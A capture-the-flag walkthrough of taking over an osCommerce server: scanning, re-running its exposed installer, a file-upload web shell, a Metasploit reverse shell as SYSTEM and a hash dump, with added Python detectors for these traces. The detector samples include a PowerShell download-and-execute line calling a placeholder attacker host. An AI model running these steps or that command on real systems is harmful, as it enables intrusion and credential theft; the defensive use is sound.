Let’s kick it off with a port scan.

Checking the ports, there is an osCommerce instance on port 8080. Accessing the catalog directory, there is a broken website. Time for directory brute-forcing. I use gobuster for that task, and an “install” page pops up.
Checking that page, I am able to install osCommerce. I used the following creds for the database:

Now I have to wait for the database to be imported. After the DB import is done, I set the admin credentials. I chose admin:admin as the username and password.
We have access to the admin panel; now it’s time to search for an exploit. Using searchsploit, I find an Arbitrary File Upload vuln.

Let’s see what we need in order to upload a shell.

Upon testing, I made this simple PHP file in order to be uploaded. With this, I can issue commands to the OS.

Time to upload the shell!

Let’s access it, put the “cmd” parameter, and issue a command.
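From the defender's side, the three steps above each leave a trace in the web server's access log: the installer still answering after setup, a server-side script sitting in a directory that should only hold images, and a “cmd” query parameter on that script. The following is an added example, not part of the original writeup, that runs those three checks over a few constructed Apache combined-format log lines; the installer path (/install/), the upload directory (/catalog/images/) and the file name shell.php are assumptions for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache "combined" format (not taken from the page).
# The client IPs, timestamps and the shell.php name are made up for the demonstration.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:01 +0000] "GET /catalog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2020:10:00:07 +0000] "GET /catalog/install/index.php HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2020:10:01:20 +0000] "GET /catalog/images/shell.php?cmd=whoami HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2020:10:02:00 +0000] "GET /catalog/images/logo.png HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumed layout: the installer lives under /install/ and uploads land under
# /catalog/images/; adjust both for a real deployment.
INSTALLER_MARKER = "/install/"
UPLOAD_DIRS = ("/catalog/images/",)
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php5", ".phar")


def parse_line(line):
    """Split one combined-format line into ip, path, parsed query and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def analyse(rec):
    """Return the list of rule names that a parsed request trips (empty if benign)."""
    findings = []
    path = rec["path"].lower()
    # Rule 1: the installer should be gone after setup; a 200 here means it is still reachable.
    if INSTALLER_MARKER in path and rec["status"] == 200:
        findings.append("installer-exposed")
    # Rule 2: a server-side script living in a directory that should only hold images.
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS):
        findings.append("script-in-upload-dir")
    # Rule 3: a "cmd" query parameter on any script is the classic web-shell signature.
    if "cmd" in rec["query"]:
        findings.append("cmd-parameter")
    return findings


def scan(log_text):
    """Scan a whole log; return (line_no, client_ip, path, findings) for flagged lines only."""
    results = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        findings = analyse(rec)
        if findings:
            results.append((line_no, rec["ip"], rec["path"], findings))
    return results


if __name__ == "__main__":
    for line_no, ip, path, findings in scan(SAMPLE_LOG):
        print(f"line {line_no}: {ip} {path} -> {', '.join(findings)}")
```

Each rule also points at its fix: delete the install directory once setup is done, restrict uploads to an allowlist of image extensions and verify the content, and switch script execution off for the upload directory on the web server (for Apache, `php_admin_flag engine off` or a `FilesMatch` deny for `.php` files inside that directory) so that even a file that slips through cannot run.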

Method 1
Seems we’re running as NT Authority (the highest-privileged account). To get a reverse shell, I leveraged the msfconsole web delivery module.

I copied the last line and pasted it into my web shell to get it executed. You’ll have to wait a little for it to execute, but it will succeed.
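On the host, this step shows up as process lineage: the web server process spawns a command shell, which spawns PowerShell with a download-and-execute command line, all under the SYSTEM account the server should never have been running as. The following is an added example, not code from the original writeup, that classifies a few constructed Sysmon-style process-creation records (Event ID 1 fields) with those two rules and marks hits that already run as SYSTEM; the image paths, the user names and the host attacker.invalid are placeholders.

```python
# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real telemetry.
# Paths, user names and the attacker host are placeholders for the demonstration.
SAMPLE_EVENTS = [
    {   # normal: Apache hands a request to PHP
        "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
        "Image": r"C:\xampp\php\php-cgi.exe",
        "CommandLine": "php-cgi.exe",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # suspicious: the web server spawning cmd.exe, i.e. a web shell running a command
        "ParentImage": r"C:\xampp\apache\bin\httpd.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # suspicious: a PowerShell download cradle, the shape a web-delivery stager takes
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://attacker.invalid/stager')\"",
        "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # benign: an administrator running PowerShell interactively
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-Process",
        "User": r"CORP\alice",
    },
]

WEB_SERVER_IMAGES = {"httpd.exe", "apache.exe", "nginx.exe", "w3wp.exe", "php-cgi.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Substrings that usually appear when PowerShell is used to fetch and run remote code.
CRADLE_MARKERS = (
    "net.webclient", "downloadstring", "downloadfile",
    "invoke-expression", "iex ", "iex(", "-encodedcommand", "-enc ",
)


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the list of detection reasons for one process-creation event."""
    reasons = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event.get("CommandLine", "").lower()

    # Rule 1: a web server has no business launching an interactive shell.
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        reasons.append("webserver-spawned-shell")
    # Rule 2: PowerShell fetching code over the network and running it in memory.
    if image in POWERSHELL_IMAGES and any(marker in cmdline for marker in CRADLE_MARKERS):
        reasons.append("powershell-download-cradle")
    # A hit is worse when the process already runs as SYSTEM: there is no escalation left to catch.
    if reasons and event.get("User", "").lower() == r"nt authority\system":
        reasons.append("runs-as-system")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event that tripped at least one rule."""
    hits = []
    for index, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((index, reasons))
    return hits


if __name__ == "__main__":
    for index, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(reasons)}")
```

The "runs-as-system" tag is the configuration lesson of this box: run the web server and PHP under a dedicated low-privilege service account, so that a web shell yields that account rather than SYSTEM and the credential dump that follows is not possible from the foothold alone.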

Now, by simply running hashdump, you’ll dump the users’ hashes.